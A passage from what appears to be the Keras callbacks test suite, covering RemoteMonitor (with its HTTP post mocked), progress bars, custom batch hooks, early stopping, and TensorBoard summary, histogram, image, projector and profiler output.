train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with tf.compat.v1.test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
def test_progbar_infers_steps(self):
x, y = np.ones((10, 1)), np.ones((10, 1))
data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2)
data = data.filter(lambda x, y: True) # Unknown cardinality.
progbar = keras.callbacks.ProgbarLogger('steps')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
self.assertIsNone(progbar.target)
model.fit(data, epochs=2, callbacks=[progbar])
self.assertEqual(progbar.target, 5)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
class MyCallback(keras.callbacks.Callback):
def on_batch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_batch_end_called = True
def on_epoch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_epoch_end_called = True
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
callback = MyCallback()
model.fit(x, y, epochs=2, callbacks=[callback])
self.assertTrue(callback.on_batch_end_called)
self.assertTrue(callback.on_batch_end_called)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
class MyCallbackWithBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
class MyCallbackWithTFBatchHooks(keras.callbacks.Callback):
def __init__(self):
super(MyCallbackWithTFBatchHooks, self).__init__()
self._supports_tf_logs = True
class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.epochs = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs += 1
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallbackWithBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
self.assertFalse(cb_list._batch_hooks_support_tf_logs)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallbackWithTFBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._batch_hooks_support_tf_logs)
my_cb = MyCallbackWithoutBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertLen(cb_list.callbacks, 1)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_logs_conversion(self):
assert_dict_equal = self.assertDictEqual
class MutateNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['numpy'] = 1
class MutateTensorFlowLogs(CallAllHooks):
def __init__(self):
super(MutateTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['tf'] = 2
class AssertNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
assert_dict_equal(logs, {'all': 0, 'numpy': 1, 'tf': 2})
class AssertTensorFlowLogs(AssertNumpyLogs):
def __init__(self):
super(AssertTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
cb_list = keras.callbacks.CallbackList([
MutateNumpyLogs(),
MutateTensorFlowLogs(),
AssertNumpyLogs(),
AssertTensorFlowLogs()
])
assert len(cb_list.callbacks) == 4
cb_list.on_epoch_begin(0, logs={'all': 0})
cb_list.on_epoch_end(0, logs={'all': 0})
cb_list.on_predict_batch_begin(0, logs={'all': 0})
cb_list.on_predict_batch_end(0, logs={'all': 0})
cb_list.on_predict_begin(logs={'all': 0})
cb_list.on_predict_end(logs={'all': 0})
cb_list.on_test_batch_begin(0, logs={'all': 0})
cb_list.on_test_batch_end(0, logs={'all': 0})
cb_list.on_test_begin(logs={'all': 0})
cb_list.on_test_end(logs={'all': 0})
cb_list.on_train_batch_begin(0, logs={'all': 0})
cb_list.on_train_batch_end(0, logs={'all': 0})
cb_list.on_train_begin(logs={'all': 0})
cb_list.on_train_end(logs={'all': 0})
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self, should_run=True):
self.should_run = should_run
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
def _implements_train_batch_hooks(self):
return self.should_run
def _implements_test_batch_hooks(self):
return self.should_run
def _implements_predict_batch_hooks(self):
return self.should_run
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallback(should_run=True)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallback(should_run=False)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 0)
self.assertEqual(my_cb.test_batches, 0)
self.assertEqual(my_cb.predict_batches, 0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_default_callbacks_do_not_call_batch_hooks(self):
model = keras.Sequential([keras.layers.Dense(1)])
log_dir = self.get_temp_dir()
cb_list = keras.callbacks.CallbackList([
keras.callbacks.TensorBoard(log_dir, profile_batch=0),
keras.callbacks.ModelCheckpoint(log_dir),
],
add_progbar=True,
model=model,
verbose=2,
epochs=3)
self.assertLen(cb_list.callbacks, 3)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_change_tf_functions_during_fit(self):
class ChangeFunctions(keras.callbacks.Callback):
def on_epoch_end(self, epochs, logs=None):
def new_fn(iterator):
raise ValueError('New function substituted successfully.')
self.model.train_function = new_fn
self.model.test_function = new_fn
self.model.predict_function = new_fn
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
with self.assertRaisesRegexp(ValueError, 'New function '):
model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()])
with self.assertRaisesRegexp(ValueError, 'New function '):
model.evaluate(x, y, batch_size=2)
with self.assertRaisesRegexp(ValueError, 'New function '):
model.predict(x, batch_size=2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_stop_training_batch_level(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self):
super(MyCallback, self).__init__()
self.batch_counter = 0
def on_train_batch_end(self, batch, logs=None):
self.batch_counter += 1
if batch == 2:
self.model.stop_training = True
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
my_cb = MyCallback()
# Will run 5 batches if `stop_training` doesn't work.
model.fit(x, y, batch_size=2, callbacks=[my_cb])
self.assertEqual(my_cb.batch_counter, 3)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_built_in_callback_order(self):
class CustomCallback(keras.callbacks.Callback):
pass
class TestingCallbackList(keras.callbacks.CallbackList):
def __init__(self, *args, **kwargs):
super(TestingCallbackList, self).__init__(*args, **kwargs)
if ((not isinstance(self.callbacks[0], CustomCallback)) or
(not isinstance(self.callbacks[1], keras.callbacks.History)) or
(not isinstance(self.callbacks[2], keras.callbacks.ProgbarLogger))):
raise AssertionError(f'Callback order unexpected: {self.callbacks}')
with mock.patch.object(
keras.callbacks, 'CallbackList', TestingCallbackList):
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
custom_callback = CustomCallback()
model.fit(np.ones((10, 10)), np.ones((10, 1)), epochs=5,
callbacks=[custom_callback])
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile:
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
self.graph_defs = []
self.convert_from_v2_summary_proto = False
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, _, filenames) in os.walk(logdir):
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in tf.compat.v1.train.summary_iterator(path):
if event.graph_def:
result.graph_defs.append(event.graph_def)
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Convert the tf2 summary proto to old style for type checking.
plugin_name = value.metadata.plugin_data.plugin_name
container = {
'images': result.images,
'histograms': result.histograms,
'scalars': result.scalars,
}.get(plugin_name)
if container is not None:
result.convert_from_v2_summary_proto = True
else:
container = result.tensors
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self, compile_model=True):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
if compile_model:
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=validation_dir, tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.train_dir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
def test_TensorBoard_learning_rate_schedules(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[keras.callbacks.TensorBoard(self.logdir)])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
},
)
def test_TensorBoard_global_step(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
verbose=0,
callbacks=[
keras.callbacks.TensorBoard(
self.logdir,
update_freq=1,
profile_batch=0,
write_steps_per_second=True)
])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
_ObservedSummary(
logdir=self.train_dir, tag='epoch_steps_per_second'),
_ObservedSummary(
logdir=self.train_dir, tag='batch_steps_per_second'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
if summary_file.convert_from_v2_summary_proto:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
}
else:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
}
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
expected
)
def test_TensorBoard_projector_callback(self):
layers = [
keras.layers.Embedding(10, 10, name='test_embedding'),
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
optimizer='adam',
loss=keras.losses.BinaryCrossentropy(from_logits=True),
run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10)), np.ones((10, 10))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir,
embeddings_freq=1,
embeddings_metadata={'test_embedding': 'metadata.tsv'})
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f:
self.assertEqual(f.readlines(), [
'embeddings {\n',
(' tensor_name: '
'"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'),
' metadata_path: "metadata.tsv"\n', '}\n'
])
def test_custom_summary(self):
if not tf.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = tf.compat.v1.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with tf.summary.experimental.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return tf.summary.write(
tag=tag,
tensor=tf.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', tf.reduce_sum(x))
return x
model = testing_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
def test_TensorBoard_non_blocking(self):
model = keras.Sequential([keras.layers.Dense(1)])
tb = keras.callbacks.TensorBoard(self.logdir)
self.assertTrue(tb._supports_tf_logs)
cb_list = keras.callbacks.CallbackList([tb],
model=model,
epochs=1,
steps=100,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, TensorBoard is causing a blocking '
'NumPy conversion.')
with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy):
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly())
return model
def _count_trace_file(self, logdir):
profile_dir = os.path.join(logdir, 'plugins', 'profile')
count = 0
for (dirpath, dirnames, filenames) in os.walk(profile_dir):
del dirpath # unused
del dirnames # unused
for filename in filenames:
if filename.endswith('.trace.json.gz'):
count += 1
return count
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=3,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
if not model.run_eagerly:
# There should be one train graph
self.assertLen(summary_file.graph_defs, 1)
for graph_def in summary_file.graph_defs:
graph_def_str = str(graph_def)
# All the model layers should appear in the graphs
for layer in model.layers:
if 'input' not in layer.name:
self.assertIn(layer.name, graph_def_str)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_outerProfiler(self):
"""Runs a profiler session that interferes with the one from the callback.
The callback will not generate a profile but execution will proceed without
crashing due to unhandled exceptions.
"""
tf.profiler.experimental.start(logdir='')
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
tf.profiler.experimental.stop(save=False)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeTwice(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
time.sleep(1) # Avoids the second profile over-writing the first.
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
self.assertEqual(2, self._count_trace_file(logdir=self.logdir))
